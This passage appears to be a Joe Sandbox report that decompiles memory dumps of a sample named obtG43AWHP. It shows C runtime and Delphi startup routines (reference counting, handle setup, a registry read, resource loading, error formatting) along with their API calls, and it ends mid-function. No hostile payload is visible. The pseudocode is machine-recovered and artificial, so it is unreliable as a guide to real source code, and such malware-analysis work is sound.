    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E030065E7(LONG* _a4) {
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				LONG* _t21;
    				long* _t32;
    				LONG* _t34;
    
    				_t34 = _a4;
    				if(_t34 == 0) {
    					L18:
    					return _t34;
    				}
    				InterlockedDecrement(_t34);
    				_t16 = _t34[0x2c];
    				if(_t16 != 0) {
    					InterlockedDecrement(_t16);
    				}
    				_t17 = _t34[0x2e];
    				if(_t17 != 0) {
    					InterlockedDecrement(_t17);
    				}
    				_t18 = _t34[0x2d];
    				if(_t18 != 0) {
    					InterlockedDecrement(_t18);
    				}
    				_t19 = _t34[0x30];
    				if(_t19 != 0) {
    					InterlockedDecrement(_t19);
    				}
    				_t32 =  &(_t34[0x14]);
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t32 - 8)) != 0x300b974) {
    						_t20 =  *_t32;
    						if(_t20 != 0) {
    							InterlockedDecrement(_t20);
    						}
    					}
    					if( *((intOrPtr*)(_t32 - 4)) != 0) {
    						_t21 = _t32[1];
    						if(_t21 != 0) {
    							InterlockedDecrement(_t21);
    						}
    					}
    					_t32 =  &(_t32[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				InterlockedDecrement(_t34[0x35] + 0xb4);
    				goto L18;
    			}

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 03006601
    • InterlockedDecrement.KERNEL32(?), ref: 0300660E
    • InterlockedDecrement.KERNEL32(?), ref: 0300661B
    • InterlockedDecrement.KERNEL32(?), ref: 03006628
    • InterlockedDecrement.KERNEL32(?), ref: 03006635
    • InterlockedDecrement.KERNEL32(?), ref: 03006651
    • InterlockedDecrement.KERNEL32(00000000), ref: 03006661
    • InterlockedDecrement.KERNEL32(?), ref: 03006677
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E03006558(LONG* _a4) {
    				LONG* _t15;
    				LONG* _t16;
    				LONG* _t17;
    				LONG* _t18;
    				LONG* _t19;
    				LONG* _t20;
    				long* _t30;
    				LONG* _t31;
    
    				_t31 = _a4;
    				InterlockedIncrement(_t31);
    				_t15 = _t31[0x2c];
    				if(_t15 != 0) {
    					InterlockedIncrement(_t15);
    				}
    				_t16 = _t31[0x2e];
    				if(_t16 != 0) {
    					InterlockedIncrement(_t16);
    				}
    				_t17 = _t31[0x2d];
    				if(_t17 != 0) {
    					InterlockedIncrement(_t17);
    				}
    				_t18 = _t31[0x30];
    				if(_t18 != 0) {
    					InterlockedIncrement(_t18);
    				}
    				_t30 =  &(_t31[0x14]);
    				_a4 = 6;
    				do {
    					if( *((intOrPtr*)(_t30 - 8)) != 0x300b974) {
    						_t19 =  *_t30;
    						if(_t19 != 0) {
    							InterlockedIncrement(_t19);
    						}
    					}
    					if( *((intOrPtr*)(_t30 - 4)) != 0) {
    						_t20 = _t30[1];
    						if(_t20 != 0) {
    							InterlockedIncrement(_t20);
    						}
    					}
    					_t30 =  &(_t30[4]);
    					_t11 =  &_a4;
    					 *_t11 = _a4 - 1;
    				} while ( *_t11 != 0);
    				return InterlockedIncrement(_t31[0x35] + 0xb4);
    			}

    APIs
    • InterlockedIncrement.KERNEL32(?), ref: 0300656A
    • InterlockedIncrement.KERNEL32(?), ref: 03006577
    • InterlockedIncrement.KERNEL32(?), ref: 03006584
    • InterlockedIncrement.KERNEL32(?), ref: 03006591
    • InterlockedIncrement.KERNEL32(?), ref: 0300659E
    • InterlockedIncrement.KERNEL32(?), ref: 030065BA
    • InterlockedIncrement.KERNEL32(00000000), ref: 030065CA
    • InterlockedIncrement.KERNEL32(?), ref: 030065E0
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E030048FF() {
    				intOrPtr* _v8;
    				void** _v12;
    				struct _STARTUPINFOW _v80;
    				signed int _t61;
    				void* _t62;
    				long _t65;
    				signed int _t68;
    				signed int _t69;
    				signed int _t70;
    				int _t72;
    				signed int _t73;
    				intOrPtr* _t74;
    				void* _t77;
    				long _t85;
    				signed int _t86;
    				signed int _t87;
    				signed int _t88;
    				signed int _t91;
    				int _t93;
    				signed char _t98;
    				void* _t108;
    				signed int _t110;
    				signed int* _t111;
    				int _t112;
    				void** _t115;
    				void** _t120;
    				signed int _t121;
    
    				GetStartupInfoW( &_v80);
    				_push(0x40);
    				_t112 = 0x20;
    				_push(_t112);
    				_t61 = E03006933();
    				if(_t61 != 0) {
    					_t2 = _t61 + 0x800; // 0x800
    					 *0x3012f80 = _t61;
    					 *0x3012f68 = _t112;
    					__eflags = _t61 - _t2;
    					if(_t61 >= _t2) {
    						L5:
    						__eflags = _v80.cbReserved2;
    						if(_v80.cbReserved2 == 0) {
    							L27:
    							_t91 = 0;
    							__eflags = 0;
    							do {
    								_t115 = (_t91 << 6) +  *0x3012f80;
    								_t62 =  *_t115;
    								__eflags = _t62 - 0xffffffff;
    								if(_t62 == 0xffffffff) {
    									L31:
    									_t115[1] = 0x81;
    									__eflags = _t91;
    									if(_t91 != 0) {
    										_t50 = _t91 - 1; // -1
    										asm("sbb eax, eax");
    										_t65 =  ~_t50 + 0xfffffff5;
    										__eflags = _t65;
    									} else {
    										_t65 = 0xfffffff6;
    									}
    									_t108 = GetStdHandle(_t65);
    									__eflags = _t108 - 0xffffffff;
    									if(_t108 == 0xffffffff) {
    										L43:
    										_t58 =  &(_t115[1]);
    										 *_t58 = _t115[1] | 0x00000040;
    										__eflags =  *_t58;
    										 *_t115 = 0xfffffffe;
    										goto L44;
    									} else {
    										__eflags = _t108;
    										if(_t108 == 0) {
    											goto L43;
    										}
    										_t69 = GetFileType(_t108);
    										__eflags = _t69;
    										if(_t69 == 0) {
    											goto L43;
    										}
    										_t70 = _t69 & 0x000000ff;
    										 *_t115 = _t108;
    										__eflags = _t70 - 2;
    										if(_t70 != 2) {
    											__eflags = _t70 - 3;
    											if(_t70 == 3) {
    												_t53 =  &(_t115[1]);
    												 *_t53 = _t115[1] | 0x00000008;
    												__eflags =  *_t53;
    											}
    										} else {
    											_t115[1] = _t115[1] | 0x00000040;
    										}
    										_t55 =  &(_t115[3]); // -50409332
    										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
    										__eflags = _t72;
    										if(_t72 == 0) {
    											L48:
    											_t68 = _t72 | 0xffffffff;
    											L46:
    											return _t68;
    										} else {
    											_t115[2] = _t115[2] + 1;
    											goto L44;
    										}
    									}
    								}
    								__eflags = _t62 - 0xfffffffe;
    								if(_t62 == 0xfffffffe) {
    									goto L31;
    								}
    								_t115[1] = _t115[1] | 0x00000080;
    								L44:
    								_t91 = _t91 + 1;
    								__eflags = _t91 - 3;
    							} while (_t91 < 3);
    							SetHandleCount( *0x3012f68);
    							_t68 = 0;
    							__eflags = 0;
    							goto L46;
    						}
    						_t73 = _v80.lpReserved2;
    						__eflags = _t73;
    						if(_t73 == 0) {
    							goto L27;
    						}
    						_t93 =  *_t73;
    						_t74 = _t73 + 4;
    						_v8 = _t74;
    						_v12 = _t74 + _t93;
    						__eflags = _t93 - 0x800;
    						if(_t93 >= 0x800) {
    							_t93 = 0x800;
    						}
    						__eflags =  *0x3012f68 - _t93; // 0x0
    						if(__eflags >= 0) {
    							L18:
    							_t110 = 0;
    							__eflags = _t93;
    							if(_t93 <= 0) {
    								goto L27;
    							} else {
    								goto L19;
    							}
    							do {
    								L19:
    								_t77 =  *_v12;
    								__eflags = _t77 - 0xffffffff;
    								if(_t77 == 0xffffffff) {
    									goto L26;
    								}
    								__eflags = _t77 - 0xfffffffe;
    								if(_t77 == 0xfffffffe) {
    									goto L26;
    								}
    								_t98 =  *_v8;
    								__eflags = _t98 & 0x00000001;
    								if((_t98 & 0x00000001) == 0) {
    									goto L26;
    								}
    								__eflags = _t98 & 0x00000008;
    								if((_t98 & 0x00000008) != 0) {
    									L24:
    									_t120 = ((_t110 & 0x0000001f) << 6) + 0x3012f80[_t110 >> 5];
    									 *_t120 =  *_v12;
    									_t120[1] =  *_v8;
    									_t40 =  &(_t120[3]); // 0xc
    									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
    									__eflags = _t72;
    									if(_t72 == 0) {
    										goto L48;
    									}
    									_t41 =  &(_t120[2]);
    									 *_t41 = _t120[2] + 1;
    									__eflags =  *_t41;
    									goto L26;
    								}
    								_t85 = GetFileType(_t77);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									goto L26;
    								}
    								goto L24;
    								L26:
    								_v12 =  &(_v12[1]);
    								_t110 = _t110 + 1;
    								_v8 = _v8 + 1;
    								__eflags = _t110 - _t93;
    							} while (_t110 < _t93);
    							goto L27;
    						} else {
    							_t111 = 0x3012f84;
    							while(1) {
    								_t86 = E03006933(0x20, 0x40);
    								__eflags = _t86;
    								if(_t86 == 0) {
    									break;
    								}
    								 *0x3012f68 =  *0x3012f68 + 0x20;
    								_t16 = _t86 + 0x800; // 0x800
    								 *_t111 = _t86;
    								__eflags = _t86 - _t16;
    								if(_t86 >= _t16) {
    									L15:
    									_t111 =  &(_t111[1]);
    									__eflags =  *0x3012f68 - _t93; // 0x0
    									if(__eflags < 0) {
    										continue;
    									}
    									goto L18;
    								}
    								_t87 = _t86 + 5;
    								__eflags = _t87;
    								do {
    									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
    									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
    									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
    									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
    									 *((short*)(_t87 - 1)) = 0xa00;
    									 *((short*)(_t87 + 0x20)) = 0xa0a;
    									 *((char*)(_t87 + 0x2f)) = 0;
    									_t87 = _t87 + 0x40;
    									_t28 = _t87 - 5; // -74
    									__eflags = _t28 -  *_t111 + 0x800;
    								} while (_t28 <  *_t111 + 0x800);
    								goto L15;
    							}
    							_t93 =  *0x3012f68; // 0x0
    							goto L18;
    						}
    					}
    					_t88 = _t61 + 5;
    					__eflags = _t88;
    					do {
    						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
    						 *((short*)(_t88 - 1)) = 0xa00;
    						 *((intOrPtr*)(_t88 + 3)) = 0;
    						 *((short*)(_t88 + 0x1f)) = 0xa00;
    						 *((char*)(_t88 + 0x21)) = 0xa;
    						 *((intOrPtr*)(_t88 + 0x33)) = 0;
    						 *((char*)(_t88 + 0x2f)) = 0;
    						_t121 =  *0x3012f80; // 0x0
    						_t88 = _t88 + 0x40;
    						_t11 = _t88 - 5; // -74
    						__eflags = _t11 - _t121 + 0x800;
    					} while (_t11 < _t121 + 0x800);
    					goto L5;
    				}
    				return _t61 | 0xffffffff;
    			}

    APIs
    • GetStartupInfoW.KERNEL32(?), ref: 0300490C
      • Part of subcall function 03006933: Sleep.KERNEL32(00000000,03002BF3), ref: 0300695B
    • GetFileType.KERNEL32(?), ref: 03004A3F
    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 03004A75
    • GetStdHandle.KERNEL32(-000000F6), ref: 03004AC9
    • GetFileType.KERNEL32(00000000), ref: 03004ADB
    • InitializeCriticalSectionAndSpinCount.KERNEL32(-03012F74,00000FA0), ref: 03004B09
    • SetHandleCount.KERNEL32 ref: 03004B32
    Memory Dump Source
    • Source File: 00000002.00000002.1468041017.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000002.00000002.1468029210.03000000.00000002.sdmp
    • Associated: 00000002.00000002.1468050212.0300B000.00000008.sdmp
    • Associated: 00000002.00000002.1468058188.0300C000.00000004.sdmp
    • Associated: 00000002.00000002.1468067852.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3000000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1459352287.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E030063A0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t47;
    				signed int _t52;
    				signed int _t61;
    				signed int _t62;
    				signed int _t63;
    				long _t64;
    				LONG* _t67;
    				LONG* _t73;
    				intOrPtr _t89;
    				intOrPtr _t97;
    				void* _t98;
    				void* _t101;
    
    				_t101 = __eflags;
    				_t87 = __edx;
    				_push(0x14);
    				_push(0x30098f8);
    				E03005030(__ebx, __edi, __esi);
    				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
    				_t89 = E03004D40(__ebx, __edx, _t101);
    				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
    				E03006097(__ebx, __edx, _t89, __esi, _t101);
    				_t47 = E0300613B( *((intOrPtr*)(_t98 + 8)));
    				 *((intOrPtr*)(_t98 + 8)) = _t47;
    				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
    					_t41 = _t98 - 0x20;
    					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
    					__eflags =  *_t41;
    					L26:
    					return E03005075( *(_t98 - 0x20));
    				}
    				_t73 = E030068EE(0x220);
    				_t103 = _t73;
    				if(_t73 == 0) {
    					goto L26;
    				}
    				memcpy(_t73,  *(_t89 + 0x68), 0x88 << 2);
    				 *_t73 =  *_t73 & 0x00000000;
    				_t52 = E030061B7(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
